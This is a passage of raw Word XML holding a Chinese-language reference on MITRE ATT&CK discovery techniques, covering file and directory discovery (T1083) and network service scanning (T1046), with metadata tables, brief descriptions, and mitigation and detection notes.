        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>GetAllTrustRelationships()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断攻击者是否使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域信任发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945B4EB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="4488B052" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023AA373" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> T1083</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9D1193" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB800FC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500A8017" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>某些文件夹可能需要管理员，系统或特定用户权限，具体取决于权限级别和访问控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE0C334" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72AD7B5A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04622742" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AE10D1C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00604A2E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="36C0C46A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以枚举文件和目录，或者可以在主机或网络共享的特定位置搜索文件系统内的某些信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BD6CC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAC241B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用于获取此信息的示例实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>自定义工具也可用于收集文件和目录信息并与</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1EB09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac and Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2A033" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中，这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>发现是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>locate</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658759C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4942D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于滥用系统功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D54628" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF15522" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当攻击者学习环境时，系统和网络发现技术通常在整个操作中发生。数据和事件不应孤立地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看，而应作为一系列行为的一部分，根据获得的信息，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能导致其他活动，如收集和渗透。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BC2B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00930B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于收集系统和网络信息的操作的进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行监视</w:t>
      </w:r>
      <w:r w:rsidRPr="00930B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有内置功能的远程访问工具可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接交互以收集信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A496CEC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="6A82DD45" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DE48B66" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1046</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C4B705" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAE3B78" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232C3FCA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：管理员，系统，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7397F003" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>协议分析，网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，进程命令行参数，网络进程</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26DF95CF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:lastRenderedPageBreak/>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="396F8D50" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00AB18F9" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078D0976" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试获取远程主机上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行的服务列表，包括可能容易</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程软件利用的服务。方法包括使用系统附带的工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来扫描</w:t>
      </w:r>
      <w:r>
        <w:t>端口和漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B0ADB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="7477"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="6A3BE18D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3D0501A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
